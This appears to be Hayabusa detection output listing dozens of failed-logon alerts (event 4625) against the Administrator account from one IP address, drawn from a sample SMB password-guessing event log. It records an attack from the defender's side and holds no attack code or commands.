2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPaR2sBxPPCjxpL0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kJJ9A1EfqM4V2TRv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4dxf59xjpxO3oG17 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dMI12g4tjSF8PX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZAqN0xPaW4jg2Kjc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mcnReyIEaqsQfowV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: akOH8Y7XdjOpqTez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b0HOK1TIqloud7gh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n6uIAK55BmTnA6Bf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDnn6QmLOJ6KwzKt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: np8KaRJvRqBrGyFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dxbu69Amr6gWN5Hw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoZdaFJWNON8Ujnc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q4RSlXgOS7sssCqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2PJprE7olK4pjrx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQOAUcWQL32y2gGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nXI0wWwzhHN0uvOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujGqTzfOhmKgoAjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cFoPtWZ03O3ZZgOC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyO2VTnpGZLeSIvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ua69MEWABQ9hsooT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ubPQWn4nQYr3rXr8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xrgATdNqkA44nKqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qKwktiUfTWakNx3I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVebPFnWhbZKIANs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IyV8stIvfXLJQpsn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uStfvm0y0eZrWONH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUwTyUXe8NLG7bCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HQuDp8aZpWDANKMe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQKTlzx2gq9ayAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tCzVponBvb9mbyIr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mSwnrFv90KjN2cqj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QX5TLs2MPkia1cmk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ammLKlG1Q5awQGvN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJ1ijJjPJbF4uFlo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZOLnwIzpGz03Yjh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xS8U3UQNz6l0LZn0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no6cftQ5MF1fjZ0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5WHS6jVRnCUH0Rb5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i3oGLwrCJXJOauf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1sxPrDYV3rr4pGJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Osysh2O2A3A2bN22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FsInW9EMJZU8FOrF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ge8do8TM4GG1atMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4w5GLbpVsAhGqCiq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8eQXeW1VpRU0ptMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NhLosoA2parzTnW9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MCFTP4gVGEKFKuRI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ALrDwJz2cta9fcXB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZZNXGw28osMQLjub | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.882 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wQzvMnwYuEQRO7V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UloOAIgGuj6NecfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cVSeLo2PRgGmf83Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SaCFO8CPFLuERugV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.042 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCwV1D4L5BDZSriK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QPhLQsM4R2ua4SxW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fwgp52JNi7xnTxpN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j2GutBDenjweAluz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.250 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wflcgg5ebqu8hHGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jXaaYSU2pakw6IsK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BfJnBv3eA8wZttML | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOXSI0jPfbvW4dAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.428 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JW6aX5mNz7cETsl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NVuJLXJzlVnDLT4Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WtSwhwnApnPI9AkO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1peOkjbd1WXGEAAM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tbw3V9MtLIcxr65R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CEZ2v1f6t0luDj4D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R0omMppAFlFhE1mG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0jMvVN9eSeGW3zcN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.782 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HnFNYabbO7IpbVku | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KtyTTNdqVikZGYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DCChjnFv2hMXXwgW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:13.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvIYRZSomaJYJOH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
